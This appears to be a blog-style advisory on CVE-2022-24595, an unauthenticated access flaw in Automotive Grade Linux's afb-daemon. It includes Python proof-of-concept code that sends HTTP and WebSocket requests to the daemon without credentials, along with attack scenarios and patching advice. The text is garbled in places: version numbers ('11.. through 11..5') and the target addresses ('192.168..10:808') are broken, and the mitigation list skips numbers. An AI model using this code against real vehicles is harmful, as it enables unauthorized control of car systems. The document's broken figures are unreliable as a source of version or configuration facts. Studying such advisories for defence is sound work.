CVE-2022-24595 is a critical vulnerability that affects multiple versions of Automotive Grade Linux (AGL) Kooky Koi, specifically versions 11.. through 11..5. Discovered in the afb-daemon binary, this bug allows unauthorized remote attackers to execute privileged actions simply by sending specially crafted HTTP or WebSocket requests. No authentication, credentials, or user interaction are required—making this a particularly dangerous flaw for connected vehicles and systems leveraging AGL.

🕵️‍♀️ What is Automotive Grade Linux (AGL)?

Automotive Grade Linux is an open source platform that serves as a base operating system for automotive applications, used by major automakers and suppliers globally. The afb-daemon (Application Framework Binder daemon) acts as a central middleware process, enabling communication between apps, vehicle signals, and cloud services.

🚨 The Vulnerability Explained

The root cause of CVE-2022-24595 is Incorrect Access Control in usr/bin/afb-daemon.

How It Happens

- The afb-daemon listens for incoming HTTP/WebSocket requests on a local or network socket.

An attacker can send a well-crafted HTTP or WebSocket request.

- If processed by afb-daemon, the request could trigger administrative actions or expose sensitive info.

Simply put: Any nearby device (or network node) can talk directly to the car's middleware and ask it to perform tasks, with no security barriers in place.

👾 Proof-of-Concept Code

Here’s a basic Python example for talking to a vulnerable afb-daemon using HTTP. (Do not use this on vehicles you do not own or have explicit permission to test!)

import requests

# Replace with your target's IP address and port
target = "http://192.168..10:808";

# Sample API endpoint (as used in AGL API docs)
endpoint = "/api/helloworld/ping" 

url = f"{target}{endpoint}"

# No authentication involved!
response = requests.get(url)

print("Status:", response.status_code)
print("Response:", response.text)

Depending on how the afb-daemon is configured, you may also craft POST requests to manipulate or control components.

For WebSocket communication (using the websockets library)

import asyncio
import websockets

async def call_afb_daemon():
    uri = "ws://192.168..10:808/api"
    async with websockets.connect(uri) as websocket:
        # Sample JSON-RPC command (may vary per service/exposure)
        payload = '{"jtype":"afb_req","request":{"api":"helloworld","verb":"ping"}}'
        await websocket.send(payload)
        response = await websocket.recv()
        print("Received:", response)

asyncio.get_event_loop().run_until_complete(call_afb_daemon())

Outcome: If vulnerable, the daemon will answer or execute the command—despite no credentials being presented.

Real-World Attack Scenarios

- Evil Device on Car Wi-Fi: An attacker connects to the same Wi-Fi network as the vehicle. They scan for open ports, find the afb-daemon socket, and issue damaging commands.
- Malicious App in the Car: If untrusted or rogue apps are able to reach the daemon, they may escalate privileges or attack the system.

🛡️ What Should You Do?

1. Upgrade your AGL platform. The Automotive Grade Linux team advises upgrading to a patched version or installing hotfixes.

Restrict network access to any process running afb-daemon.

3. Enable authentication for all HTTP/WebSocket endpoints exposed by afb-daemon.

Review AGL Security Best Practices:

https://docs.automotivelinux.org/docs/architecture/en/dev/reference/security/

📚 Original References

- NVD Entry: CVE-2022-24595
- Automotive Grade Linux Home
- afb-daemon GitHub Repository
- AGL Security Overview

📝 Takeaway

CVE-2022-24595 is a powerful reminder that even essential middleware in automotive systems can harbor dangerous bugs if access controls are overlooked. Manufacturers, integrators, and users should always lock down potentially exposed sockets, enforce authentication, and keep platform software up-to-date.

This vulnerability lets an attacker become an admin of the car’s digital ecosystem—simply by sending a network packet. Don’t let your car get hacked: patch and protect your AGL-based systems today!


*Exclusively written in simple American English for clarity. If you want more technical deep-dives or help with securing your AGL deployment, check out the linked documentation and community resources above.*

Timeline

Published on: 03/18/2022 12:15:00 UTC
Last modified on: 03/28/2022 13:23:00 UTC